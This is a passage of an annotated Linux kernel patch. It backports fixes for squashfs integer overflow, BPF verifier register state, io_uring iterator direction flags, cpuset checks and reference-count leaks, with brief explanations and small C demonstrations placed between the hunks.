+-	else if (iov_iter_rw(&iter) == WRITE)
++	else if (type == ITER_SOURCE)
+ 		error = vmsplice_to_pipe(f.file, &iter, flags);
+ 	else
+ 		error = vmsplice_to_user(f.file, &iter, flags);
+diff --git a/fs/squashfs/squashfs_fs.h b/fs/squashfs/squashfs_fs.h
+index b3fdc8212c5f5..95f8e89017689 100644
+--- a/fs/squashfs/squashfs_fs.h
++++ b/fs/squashfs/squashfs_fs.h
+@@ -183,7 +183,7 @@ static inline int squashfs_block_size(__le32 raw)
+ #define SQUASHFS_ID_BLOCK_BYTES(A)	(SQUASHFS_ID_BLOCKS(A) *\
+ 					sizeof(u64))
+ /* xattr id lookup table defines */
+-#define SQUASHFS_XATTR_BYTES(A)		((A) * sizeof(struct squashfs_xattr_id))
++#define SQUASHFS_XATTR_BYTES(A)		(((u64) (A)) * sizeof(struct squashfs_xattr_id))
+ 
+ #define SQUASHFS_XATTR_BLOCK(A)		(SQUASHFS_XATTR_BYTES(A) / \
+ 					SQUASHFS_METADATA_SIZE)
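
The widening cast in SQUASHFS_XATTR_BYTES matters because the id count comes from the on-disk superblock: a 32-bit multiply can wrap and make an enormous table length look tiny, defeating the later bounds checks. A sketch of the wrap, using an illustrative 16-byte entry size:

    #include <inttypes.h>
    #include <stdint.h>
    #include <stdio.h>

    #define ENTRY_SIZE 16u  /* stand-in for sizeof(struct squashfs_xattr_id) */

    int main(void)
    {
        unsigned int ids = 0x10000001;  /* attacker-controlled count */

        uint64_t broken = ids * ENTRY_SIZE;            /* 32-bit multiply, wraps */
        uint64_t fixed  = (uint64_t)ids * ENTRY_SIZE;  /* widened before multiply */

        printf("broken: 0x%" PRIx64 "\n", broken);  /* 0x10 */
        printf("fixed:  0x%" PRIx64 "\n", fixed);   /* 0x100000010 */
        return 0;
    }
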
+diff --git a/fs/squashfs/squashfs_fs_sb.h b/fs/squashfs/squashfs_fs_sb.h
+index 1e90c2575f9bf..0c1ae97897317 100644
+--- a/fs/squashfs/squashfs_fs_sb.h
++++ b/fs/squashfs/squashfs_fs_sb.h
+@@ -63,7 +63,7 @@ struct squashfs_sb_info {
+ 	long long				bytes_used;
+ 	unsigned int				inodes;
+ 	unsigned int				fragments;
+-	int					xattr_ids;
++	unsigned int				xattr_ids;
+ 	unsigned int				ids;
+ 	bool					panic_on_errors;
+ };
+diff --git a/fs/squashfs/xattr.h b/fs/squashfs/xattr.h
+index d8a270d3ac4cb..f1a463d8bfa02 100644
+--- a/fs/squashfs/xattr.h
++++ b/fs/squashfs/xattr.h
+@@ -10,12 +10,12 @@
+ 
+ #ifdef CONFIG_SQUASHFS_XATTR
+ extern __le64 *squashfs_read_xattr_id_table(struct super_block *, u64,
+-		u64 *, int *);
++		u64 *, unsigned int *);
+ extern int squashfs_xattr_lookup(struct super_block *, unsigned int, int *,
+ 		unsigned int *, unsigned long long *);
+ #else
+ static inline __le64 *squashfs_read_xattr_id_table(struct super_block *sb,
+-		u64 start, u64 *xattr_table_start, int *xattr_ids)
++		u64 start, u64 *xattr_table_start, unsigned int *xattr_ids)
+ {
+ 	struct squashfs_xattr_id_table *id_table;
+ 
+diff --git a/fs/squashfs/xattr_id.c b/fs/squashfs/xattr_id.c
+index 087cab8c78f4e..b88d19e9581e9 100644
+--- a/fs/squashfs/xattr_id.c
++++ b/fs/squashfs/xattr_id.c
+@@ -56,7 +56,7 @@ int squashfs_xattr_lookup(struct super_block *sb, unsigned int index,
+  * Read uncompressed xattr id lookup table indexes from disk into memory
+  */
+ __le64 *squashfs_read_xattr_id_table(struct super_block *sb, u64 table_start,
+-		u64 *xattr_table_start, int *xattr_ids)
++		u64 *xattr_table_start, unsigned int *xattr_ids)
+ {
+ 	struct squashfs_sb_info *msblk = sb->s_fs_info;
+ 	unsigned int len, indexes;
+@@ -76,7 +76,7 @@ __le64 *squashfs_read_xattr_id_table(struct super_block *sb, u64 table_start,
+ 	/* Sanity check values */
+ 
+ 	/* there is always at least one xattr id */
+-	if (*xattr_ids == 0)
++	if (*xattr_ids <= 0)
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	len = SQUASHFS_XATTR_BLOCK_BYTES(*xattr_ids);
+diff --git a/include/kunit/test.h b/include/kunit/test.h
+index b1ab6b32216d7..ebcdbddf8344d 100644
+--- a/include/kunit/test.h
++++ b/include/kunit/test.h
+@@ -299,7 +299,6 @@ static inline int kunit_run_all_tests(void)
+  */
+ #define kunit_test_init_section_suites(__suites...)			\
+ 	__kunit_test_suites(CONCATENATE(__UNIQUE_ID(array), _probe),	\
+-			    CONCATENATE(__UNIQUE_ID(suites), _probe),	\
+ 			    ##__suites)
+ 
+ #define kunit_test_init_section_suite(suite)	\
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 4aa1dbc7b0646..4e1bfee9675d2 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -668,7 +668,8 @@ extern struct efi {
+ 
+ #define EFI_RT_SUPPORTED_ALL					0x3fff
+ 
+-#define EFI_RT_SUPPORTED_TIME_SERVICES				0x000f
++#define EFI_RT_SUPPORTED_TIME_SERVICES				0x0003
++#define EFI_RT_SUPPORTED_WAKEUP_SERVICES			0x000c
+ #define EFI_RT_SUPPORTED_VARIABLE_SERVICES			0x0070
+ 
+ extern struct mm_struct efi_mm;
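
The efi.h hunk narrows EFI_RT_SUPPORTED_TIME_SERVICES from 0x000f to 0x0003 (GetTime/SetTime only) and splits GetWakeupTime/SetWakeupTime into their own mask, so firmware that lacks a wakeup timer no longer fails the basic time-services test. A tiny sketch of the two checks:

    #include <stdio.h>

    #define RT_TIME_SERVICES   0x0003  /* was 0x000f */
    #define RT_WAKEUP_SERVICES 0x000c

    int main(void)
    {
        unsigned int rt_supported = 0x0003;  /* firmware with no wakeup timer */

        /* the old single 0x000f mask would have reported time as unsupported */
        printf("time ok:   %d\n",
               (rt_supported & RT_TIME_SERVICES) == RT_TIME_SERVICES);     /* 1 */
        printf("wakeup ok: %d\n",
               (rt_supported & RT_WAKEUP_SERVICES) == RT_WAKEUP_SERVICES); /* 0 */
        return 0;
    }
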
+diff --git a/include/linux/highmem-internal.h b/include/linux/highmem-internal.h
+index 034b1106d0228..e098f38422af5 100644
+--- a/include/linux/highmem-internal.h
++++ b/include/linux/highmem-internal.h
+@@ -200,7 +200,7 @@ static inline void *kmap_local_pfn(unsigned long pfn)
+ static inline void __kunmap_local(const void *addr)
+ {
+ #ifdef ARCH_HAS_FLUSH_ON_KUNMAP
+-	kunmap_flush_on_unmap(addr);
++	kunmap_flush_on_unmap(PTR_ALIGN_DOWN(addr, PAGE_SIZE));
+ #endif
+ }
+ 
+@@ -227,7 +227,7 @@ static inline void *kmap_atomic_pfn(unsigned long pfn)
+ static inline void __kunmap_atomic(const void *addr)
+ {
+ #ifdef ARCH_HAS_FLUSH_ON_KUNMAP
+-	kunmap_flush_on_unmap(addr);
++	kunmap_flush_on_unmap(PTR_ALIGN_DOWN(addr, PAGE_SIZE));
+ #endif
+ 	pagefault_enable();
+ 	if (IS_ENABLED(CONFIG_PREEMPT_RT))
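
kunmap_flush_on_unmap() expects the page base, but kunmap_local()/kunmap_atomic() can be handed a pointer into the middle of the mapped page (for instance via kmap_local_folio() with a non-zero offset), so the hunks above round the address down first. A sketch of the masking; PAGE_SIZE and the macro body here are illustrative userspace stand-ins:

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    #define PAGE_SIZE 4096UL
    #define PTR_ALIGN_DOWN(p, a) \
        ((void *)((uintptr_t)(p) & ~((uintptr_t)(a) - 1)))

    int main(void)
    {
        char *page = aligned_alloc(PAGE_SIZE, PAGE_SIZE);  /* page-aligned block */
        char *addr;

        if (!page)
            return 1;
        addr = page + 123;  /* pointer into the middle of the "page" */

        printf("addr:    %p\n", (void *)addr);
        printf("aligned: %p\n", PTR_ALIGN_DOWN(addr, PAGE_SIZE));
        printf("matches page base: %d\n",
               PTR_ALIGN_DOWN(addr, PAGE_SIZE) == (void *)page);  /* 1 */
        free(page);
        return 0;
    }
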
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 8b4f93e848680..770650d1ff842 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -7,6 +7,7 @@
+ #include <linux/fs.h>
+ #include <linux/hugetlb_inline.h>
+ #include <linux/cgroup.h>
++#include <linux/page_ref.h>
+ #include <linux/list.h>
+ #include <linux/kref.h>
+ #include <linux/pgtable.h>
+@@ -1182,6 +1183,18 @@ static inline __init void hugetlb_cma_reserve(int order)
+ }
+ #endif
+ 
++#ifdef CONFIG_ARCH_WANT_HUGE_PMD_SHARE
++static inline bool hugetlb_pmd_shared(pte_t *pte)
++{
++	return page_count(virt_to_page(pte)) > 1;
++}
++#else
++static inline bool hugetlb_pmd_shared(pte_t *pte)
++{
++	return false;
++}
++#endif
++
+ bool want_pmd_share(struct vm_area_struct *vma, unsigned long addr);
+ 
+ #ifndef __HAVE_ARCH_FLUSH_HUGETLB_TLB_RANGE
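
The new hugetlb_pmd_shared() helper leans on an existing convention: a PMD page table shared across processes holds one page reference per mm that maps it, so a count above one means "shared". The fs/proc/task_mmu.c and mm/mempolicy.c hunks in this patch use it to classify hugetlb pages correctly. A sketch with a plain counter standing in for the struct page refcount:

    #include <stdbool.h>
    #include <stdio.h>

    struct pmd_page { int count; };  /* page backing the PMD table */

    static bool hugetlb_pmd_shared(const struct pmd_page *p)
    {
        return p->count > 1;
    }

    int main(void)
    {
        struct pmd_page priv = { 1 };  /* mapped by a single mm */
        struct pmd_page shar = { 3 };  /* shared by three mms */

        printf("private: %d\n", hugetlb_pmd_shared(&priv));  /* 0 */
        printf("shared:  %d\n", hugetlb_pmd_shared(&shar));  /* 1 */
        return 0;
    }
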
+diff --git a/include/linux/memcontrol.h b/include/linux/memcontrol.h
+index e1644a24009c8..e039763029563 100644
+--- a/include/linux/memcontrol.h
++++ b/include/linux/memcontrol.h
+@@ -1655,10 +1655,13 @@ void mem_cgroup_track_foreign_dirty_slowpath(struct folio *folio,
+ static inline void mem_cgroup_track_foreign_dirty(struct folio *folio,
+ 						  struct bdi_writeback *wb)
+ {
++	struct mem_cgroup *memcg;
++
+ 	if (mem_cgroup_disabled())
+ 		return;
+ 
+-	if (unlikely(&folio_memcg(folio)->css != wb->memcg_css))
++	memcg = folio_memcg(folio);
++	if (unlikely(memcg && &memcg->css != wb->memcg_css))
+ 		mem_cgroup_track_foreign_dirty_slowpath(folio, wb);
+ }
+ 
+diff --git a/include/linux/nvmem-provider.h b/include/linux/nvmem-provider.h
+index 50caa117cb620..bb15c9234e21e 100644
+--- a/include/linux/nvmem-provider.h
++++ b/include/linux/nvmem-provider.h
+@@ -70,7 +70,6 @@ struct nvmem_keepout {
+  * @word_size:	Minimum read/write access granularity.
+  * @stride:	Minimum read/write access stride.
+  * @priv:	User context passed to read/write callbacks.
+- * @wp-gpio:	Write protect pin
+  * @ignore_wp:  Write Protect pin is managed by the provider.
+  *
+  * Note: A default "nvmem<id>" name will be assigned to the device if
+@@ -85,7 +84,6 @@ struct nvmem_config {
+ 	const char		*name;
+ 	int			id;
+ 	struct module		*owner;
+-	struct gpio_desc	*wp_gpio;
+ 	const struct nvmem_cell_info	*cells;
+ 	int			ncells;
+ 	const struct nvmem_keepout *keepout;
+diff --git a/include/linux/uio.h b/include/linux/uio.h
+index 2e3134b14ffd9..87fc3d0dda98f 100644
+--- a/include/linux/uio.h
++++ b/include/linux/uio.h
+@@ -29,6 +29,9 @@ enum iter_type {
+ 	ITER_UBUF,
+ };
+ 
++#define ITER_SOURCE	1	// == WRITE
++#define ITER_DEST	0	// == READ
++
+ struct iov_iter_state {
+ 	size_t iov_offset;
+ 	size_t count;
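
This uio.h hunk is what lets every READ to ITER_DEST and WRITE to ITER_SOURCE conversion throughout this patch compile on 6.1: the new names are plain defines with the same values as the old ones, so converted call sites behave exactly as before while matching the upstream spelling that later fixes are written against. A trivial check of the aliasing:

    #include <assert.h>
    #include <stdio.h>

    #define READ        0
    #define WRITE       1
    #define ITER_DEST   0  /* data flows into the iterator's buffers */
    #define ITER_SOURCE 1  /* data is taken from the iterator's buffers */

    int main(void)
    {
        assert(ITER_DEST == READ);
        assert(ITER_SOURCE == WRITE);
        printf("iov_iter direction aliases hold\n");
        return 0;
    }
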
+diff --git a/include/linux/util_macros.h b/include/linux/util_macros.h
+index 72299f261b253..43db6e47503c7 100644
+--- a/include/linux/util_macros.h
++++ b/include/linux/util_macros.h
+@@ -38,4 +38,16 @@
+  */
+ #define find_closest_descending(x, a, as) __find_closest(x, a, as, >=)
+ 
++/**
++ * is_insidevar - check if the @ptr points inside the @var memory range.
++ * @ptr:	the pointer to a memory address.
++ * @var:	the variable which address and size identify the memory range.
++ *
++ * Evaluates to true if the address in @ptr lies within the memory
++ * range allocated to @var.
++ */
++#define is_insidevar(ptr, var)						\
++	((uintptr_t)(ptr) >= (uintptr_t)(var) &&			\
++	 (uintptr_t)(ptr) <  (uintptr_t)(var) + sizeof(var))
++
+ #endif
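
is_insidevar() is an end-exclusive containment test: true exactly when ptr lands anywhere inside var's storage. The net/ipv4/tcp_bpf.c hunk later in this patch uses it to ask whether a socket's proto pointer lies anywhere inside the tcp_bpf_prots table. A standalone sketch:

    #include <stdint.h>
    #include <stdio.h>

    #define is_insidevar(ptr, var)                      \
        ((uintptr_t)(ptr) >= (uintptr_t)(var) &&        \
         (uintptr_t)(ptr) <  (uintptr_t)(var) + sizeof(var))

    static int table[4][2];

    int main(void)
    {
        int other;

        printf("%d\n", is_insidevar(&table[3][1], table));      /* 1: last element */
        printf("%d\n", is_insidevar(&table[3][1] + 1, table));  /* 0: one past the end */
        printf("%d\n", is_insidevar(&other, table));            /* 0: unrelated object */
        return 0;
    }
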
+diff --git a/include/scsi/libiscsi.h b/include/scsi/libiscsi.h
+index 654cc3918c948..7fb3cb787df41 100644
+--- a/include/scsi/libiscsi.h
++++ b/include/scsi/libiscsi.h
+@@ -422,6 +422,8 @@ extern int iscsi_host_get_max_scsi_cmds(struct Scsi_Host *shost,
+ extern struct iscsi_cls_session *
+ iscsi_session_setup(struct iscsi_transport *, struct Scsi_Host *shost,
+ 		    uint16_t, int, int, uint32_t, unsigned int);
++void iscsi_session_remove(struct iscsi_cls_session *cls_session);
++void iscsi_session_free(struct iscsi_cls_session *cls_session);
+ extern void iscsi_session_teardown(struct iscsi_cls_session *);
+ extern void iscsi_session_recovery_timedout(struct iscsi_cls_session *);
+ extern int iscsi_set_param(struct iscsi_cls_conn *cls_conn,
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 9046e269e5a58..520a73b5a4483 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -364,7 +364,7 @@ int io_send(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (unlikely(!sock))
+ 		return -ENOTSOCK;
+ 
+-	ret = import_single_range(WRITE, sr->buf, sr->len, &iov, &msg.msg_iter);
++	ret = import_single_range(ITER_SOURCE, sr->buf, sr->len, &iov, &msg.msg_iter);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -450,7 +450,7 @@ static int __io_recvmsg_copy_hdr(struct io_kiocb *req,
+ 		}
+ 	} else {
+ 		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(READ, msg.msg_iov, msg.msg_iovlen, UIO_FASTIOV,
++		ret = __import_iovec(ITER_DEST, msg.msg_iov, msg.msg_iovlen, UIO_FASTIOV,
+ 				     &iomsg->free_iov, &iomsg->msg.msg_iter,
+ 				     false);
+ 		if (ret > 0)
+@@ -503,7 +503,7 @@ static int __io_compat_recvmsg_copy_hdr(struct io_kiocb *req,
+ 		}
+ 	} else {
+ 		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(READ, (struct iovec __user *)uiov, msg.msg_iovlen,
++		ret = __import_iovec(ITER_DEST, (struct iovec __user *)uiov, msg.msg_iovlen,
+ 				   UIO_FASTIOV, &iomsg->free_iov,
+ 				   &iomsg->msg.msg_iter, true);
+ 		if (ret < 0)
+@@ -763,7 +763,7 @@ retry_multishot:
+ 
+ 		kmsg->fast_iov[0].iov_base = buf;
+ 		kmsg->fast_iov[0].iov_len = len;
+-		iov_iter_init(&kmsg->msg.msg_iter, READ, kmsg->fast_iov, 1,
++		iov_iter_init(&kmsg->msg.msg_iter, ITER_DEST, kmsg->fast_iov, 1,
+ 				len);
+ 	}
+ 
+@@ -857,7 +857,7 @@ retry_multishot:
+ 		sr->buf = buf;
+ 	}
+ 
+-	ret = import_single_range(READ, sr->buf, len, &iov, &msg.msg_iter);
++	ret = import_single_range(ITER_DEST, sr->buf, len, &iov, &msg.msg_iter);
+ 	if (unlikely(ret))
+ 		goto out_free;
+ 
+@@ -1097,13 +1097,13 @@ int io_send_zc(struct io_kiocb *req, unsigned int issue_flags)
+ 		return io_setup_async_addr(req, &__address, issue_flags);
+ 
+ 	if (zc->flags & IORING_RECVSEND_FIXED_BUF) {
+-		ret = io_import_fixed(WRITE, &msg.msg_iter, req->imu,
++		ret = io_import_fixed(ITER_SOURCE, &msg.msg_iter, req->imu,
+ 					(u64)(uintptr_t)zc->buf, zc->len);
+ 		if (unlikely(ret))
+ 			return ret;
+ 		msg.sg_from_iter = io_sg_from_iter;
+ 	} else {
+-		ret = import_single_range(WRITE, zc->buf, zc->len, &iov,
++		ret = import_single_range(ITER_SOURCE, zc->buf, zc->len, &iov,
+ 					  &msg.msg_iter);
+ 		if (unlikely(ret))
+ 			return ret;
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index 6223472095d2c..0218fae12eddc 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -548,12 +548,12 @@ static inline int io_rw_prep_async(struct io_kiocb *req, int rw)
+ 
+ int io_readv_prep_async(struct io_kiocb *req)
+ {
+-	return io_rw_prep_async(req, READ);
++	return io_rw_prep_async(req, ITER_DEST);
+ }
+ 
+ int io_writev_prep_async(struct io_kiocb *req)
+ {
+-	return io_rw_prep_async(req, WRITE);
++	return io_rw_prep_async(req, ITER_SOURCE);
+ }
+ 
+ /*
+@@ -704,7 +704,7 @@ int io_read(struct io_kiocb *req, unsigned int issue_flags)
+ 	loff_t *ppos;
+ 
+ 	if (!req_has_async_data(req)) {
+-		ret = io_import_iovec(READ, req, &iovec, s, issue_flags);
++		ret = io_import_iovec(ITER_DEST, req, &iovec, s, issue_flags);
+ 		if (unlikely(ret < 0))
+ 			return ret;
+ 	} else {
+@@ -716,7 +716,7 @@ int io_read(struct io_kiocb *req, unsigned int issue_flags)
+ 		 * buffers, as we dropped the selected one before retry.
+ 		 */
+ 		if (io_do_buffer_select(req)) {
+-			ret = io_import_iovec(READ, req, &iovec, s, issue_flags);
++			ret = io_import_iovec(ITER_DEST, req, &iovec, s, issue_flags);
+ 			if (unlikely(ret < 0))
+ 				return ret;
+ 		}
+@@ -851,7 +851,7 @@ int io_write(struct io_kiocb *req, unsigned int issue_flags)
+ 	loff_t *ppos;
+ 
+ 	if (!req_has_async_data(req)) {
+-		ret = io_import_iovec(WRITE, req, &iovec, s, issue_flags);
++		ret = io_import_iovec(ITER_SOURCE, req, &iovec, s, issue_flags);
+ 		if (unlikely(ret < 0))
+ 			return ret;
+ 	} else {
+diff --git a/kernel/bpf/bpf_lsm.c b/kernel/bpf/bpf_lsm.c
+index d6c9b3705f242..e6a76da4bca78 100644
+--- a/kernel/bpf/bpf_lsm.c
++++ b/kernel/bpf/bpf_lsm.c
+@@ -51,7 +51,6 @@ BTF_SET_END(bpf_lsm_current_hooks)
+  */
+ BTF_SET_START(bpf_lsm_locked_sockopt_hooks)
+ #ifdef CONFIG_SECURITY_NETWORK
+-BTF_ID(func, bpf_lsm_socket_sock_rcv_skb)
+ BTF_ID(func, bpf_lsm_sock_graft)
+ BTF_ID(func, bpf_lsm_inet_csk_clone)
+ BTF_ID(func, bpf_lsm_inet_conn_established)
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index efdbba2a0230e..a7c2f0c3fc19c 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -7607,9 +7607,9 @@ int register_btf_id_dtor_kfuncs(const struct btf_id_dtor_kfunc *dtors, u32 add_c
+ 
+ 	sort(tab->dtors, tab->cnt, sizeof(tab->dtors[0]), btf_id_cmp_func, NULL);
+ 
+-	return 0;
+ end:
+-	btf_free_dtor_kfunc_tab(btf);
++	if (ret)
++		btf_free_dtor_kfunc_tab(btf);
+ 	btf_put(btf);
+ 	return ret;
+ }
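
The btf.c hunk reroutes the success path through the end: label. Before, `return 0` bypassed the cleanup, so btf_put() was never called on success and a reference leaked on every registration; the fix funnels both paths through end: and frees the dtor table only when ret is set. A generic userspace sketch of the corrected goto-cleanup shape, with illustrative names:

    #include <stdio.h>
    #include <stdlib.h>

    struct obj { int refs; int *tab; };

    static void obj_put(struct obj *o)  { o->refs--; }
    static void free_tab(struct obj *o) { free(o->tab); o->tab = NULL; }

    static int register_dtors(struct obj *o, int fail)
    {
        int ret = 0;

        o->refs++;                 /* reference taken up front, like btf_get() */
        o->tab = malloc(16);
        if (!o->tab || fail) {
            ret = -1;
            goto end;
        }
        /* ... populate and sort the table ... */
    end:
        if (ret)
            free_tab(o);           /* tear down the table only on error */
        obj_put(o);                /* always drop the reference: no leak */
        return ret;
    }

    int main(void)
    {
        struct obj o = { 0, NULL };

        register_dtors(&o, 0);
        printf("refs after success: %d\n", o.refs);  /* 0, not 1 */
        free_tab(&o);
        return 0;
    }
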
+diff --git a/kernel/bpf/memalloc.c b/kernel/bpf/memalloc.c
+index 4901fa1048cd7..6187c28d266f0 100644
+--- a/kernel/bpf/memalloc.c
++++ b/kernel/bpf/memalloc.c
+@@ -71,7 +71,7 @@ static int bpf_mem_cache_idx(size_t size)
+ 	if (size <= 192)
+ 		return size_index[(size - 1) / 8] - 1;
+ 
+-	return fls(size - 1) - 1;
++	return fls(size - 1) - 2;
+ }
+ 
+ #define NUM_CACHES 11
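
For sizes above 192 the cache index comes from fls(); with the old "- 1" the mapping skipped a slot and, for 4096-byte objects, indexed one past the NUM_CACHES-entry array. A sketch of both mappings, assuming the file's sizes[] table is {96, 192, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096} and implementing fls() via __builtin_clz since userspace glibc lacks the kernel helper:

    #include <stdio.h>

    static const unsigned short sizes[11] =  /* assumed cache geometry */
        { 96, 192, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096 };

    static int fls(unsigned int x)  /* kernel semantics: fls(1) == 1 */
    {
        return x ? 32 - __builtin_clz(x) : 0;
    }

    int main(void)
    {
        unsigned int size;

        for (size = 256; size <= 4096; size <<= 1) {
            int old = fls(size - 1) - 1;  /* off by one: 4096 -> 11, out of bounds */
            int new = fls(size - 1) - 2;

            printf("size %4u: old %2d, new %2d -> %u-byte cache\n",
                   size, old, new, sizes[new]);
        }
        return 0;
    }
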
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 398a0008aff72..ea21e008bf856 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2664,6 +2664,12 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 		if (opcode == BPF_CALL) {
+ 			if (insn->src_reg == BPF_PSEUDO_CALL)
+ 				return -ENOTSUPP;
++			/* kfunc with imm==0 is invalid and fixup_kfunc_call will
++			 * catch this error later. Make backtracking conservative
++			 * with ENOTSUPP.
++			 */
++			if (insn->src_reg == BPF_PSEUDO_KFUNC_CALL && insn->imm == 0)
++				return -ENOTSUPP;
+ 			/* regular helper call sets R0 */
+ 			*reg_mask &= ~1;
+ 			if (*reg_mask & 0x3f) {
+@@ -3011,13 +3017,24 @@ static bool __is_pointer_value(bool allow_ptr_leaks,
+ 	return reg->type != SCALAR_VALUE;
+ }
+ 
++/* Copy src state preserving dst->parent and dst->live fields */
++static void copy_register_state(struct bpf_reg_state *dst, const struct bpf_reg_state *src)
++{
++	struct bpf_reg_state *parent = dst->parent;
++	enum bpf_reg_liveness live = dst->live;
++
++	*dst = *src;
++	dst->parent = parent;
++	dst->live = live;
++}
++
+ static void save_register_state(struct bpf_func_state *state,
+ 				int spi, struct bpf_reg_state *reg,
+ 				int size)
+ {
+ 	int i;
+ 
+-	state->stack[spi].spilled_ptr = *reg;
++	copy_register_state(&state->stack[spi].spilled_ptr, reg);
+ 	if (size == BPF_REG_SIZE)
+ 		state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
+ 
+@@ -3345,7 +3362,7 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 				 */
+ 				s32 subreg_def = state->regs[dst_regno].subreg_def;
+ 
+-				state->regs[dst_regno] = *reg;
++				copy_register_state(&state->regs[dst_regno], reg);
+ 				state->regs[dst_regno].subreg_def = subreg_def;
+ 			} else {
+ 				for (i = 0; i < size; i++) {
+@@ -3366,7 +3383,7 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 
+ 		if (dst_regno >= 0) {
+ 			/* restore register state from stack */
+-			state->regs[dst_regno] = *reg;
++			copy_register_state(&state->regs[dst_regno], reg);
+ 			/* mark reg as written since spilled pointer state likely
+ 			 * has its liveness marks cleared by is_state_visited()
+ 			 * which resets stack/reg liveness for state transitions
+@@ -8085,7 +8102,7 @@ do_sim:
+ 	 */
+ 	if (!ptr_is_dst_reg) {
+ 		tmp = *dst_reg;
+-		*dst_reg = *ptr_reg;
++		copy_register_state(dst_reg, ptr_reg);
+ 	}
+ 	ret = sanitize_speculative_path(env, NULL, env->insn_idx + 1,
+ 					env->insn_idx);
+@@ -9338,7 +9355,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
+ 					 * to propagate min/max range.
+ 					 */
+ 					src_reg->id = ++env->id_gen;
+-				*dst_reg = *src_reg;
++				copy_register_state(dst_reg, src_reg);
+ 				dst_reg->live |= REG_LIVE_WRITTEN;
+ 				dst_reg->subreg_def = DEF_NOT_SUBREG;
+ 			} else {
+@@ -9349,7 +9366,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
+ 						insn->src_reg);
+ 					return -EACCES;
+ 				} else if (src_reg->type == SCALAR_VALUE) {
+-					*dst_reg = *src_reg;
++					copy_register_state(dst_reg, src_reg);
+ 					/* Make sure ID is cleared otherwise
+ 					 * dst_reg min/max could be incorrectly
+ 					 * propagated into src_reg by find_equal_scalars()
+@@ -10145,7 +10162,7 @@ static void find_equal_scalars(struct bpf_verifier_state *vstate,
+ 
+ 	bpf_for_each_reg_in_vstate(vstate, state, reg, ({
+ 		if (reg->type == SCALAR_VALUE && reg->id == known_reg->id)
+-			*reg = *known_reg;
++			copy_register_state(reg, known_reg);
+ 	}));
+ }
+ 
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b82..a753adcbc7c70 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1342,7 +1342,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 		 * A parent can be left with no CPU as long as there is no
+ 		 * task directly associated with the parent partition.
+ 		 */
+-		if (!cpumask_intersects(cs->cpus_allowed, parent->effective_cpus) &&
++		if (cpumask_subset(parent->effective_cpus, cs->cpus_allowed) &&
+ 		    partition_is_populated(parent, cs))
+ 			return PERR_NOCPUS;
+ 
+@@ -2320,6 +2320,7 @@ out:
+ 		new_prs = -new_prs;
+ 	spin_lock_irq(&callback_lock);
+ 	cs->partition_root_state = new_prs;
++	WRITE_ONCE(cs->prs_err, err);
+ 	spin_unlock_irq(&callback_lock);
+ 	/*
+ 	 * Update child cpusets, if present.
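
The cpuset hunk corrects the "parent left with no CPU" test: the old !cpumask_intersects() form only fired when the two sets were disjoint, missing the case where the child claims a superset of the parent's remaining effective CPUs. A bitmask sketch of the difference:

    #include <stdio.h>

    static int subset(unsigned int a, unsigned int b)  /* a is a subset of b */
    {
        return (a & ~b) == 0;
    }

    int main(void)
    {
        unsigned int parent_effective = 0x3;  /* CPUs 0-1 */
        unsigned int child_allowed    = 0x7;  /* CPUs 0-2 */

        /* old: only rejected when the sets were disjoint */
        printf("old test fires: %d\n",
               (child_allowed & parent_effective) == 0);           /* 0: bug */
        /* new: rejects whenever taking the child's CPUs empties the parent */
        printf("new test fires: %d\n",
               subset(parent_effective, child_allowed));           /* 1 */
        return 0;
    }
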
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index 8fe1da9614ee8..e2096b51c0047 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -1915,7 +1915,7 @@ static void debugfs_add_domain_dir(struct irq_domain *d)
+ 
+ static void debugfs_remove_domain_dir(struct irq_domain *d)
+ {
+-	debugfs_remove(debugfs_lookup(d->name, domain_dir));
++	debugfs_lookup_and_remove(d->name, domain_dir);
+ }
+ 
+ void __init irq_domain_debugfs_init(struct dentry *root)
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index eb8c117cc8b6c..9d4163abadf4e 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -832,6 +832,7 @@ static void do_bpf_send_signal(struct irq_work *entry)
+ 
+ 	work = container_of(entry, struct send_signal_irq_work, irq_work);
+ 	group_send_sig_info(work->sig, SEND_SIG_PRIV, work->task, work->type);
++	put_task_struct(work->task);
+ }
+ 
+ static int bpf_send_signal_common(u32 sig, enum pid_type type)
+@@ -866,7 +867,7 @@ static int bpf_send_signal_common(u32 sig, enum pid_type type)
+ 		 * to the irq_work. The current task may change when queued
+ 		 * irq works get executed.
+ 		 */
+-		work->task = current;
++		work->task = get_task_struct(current);
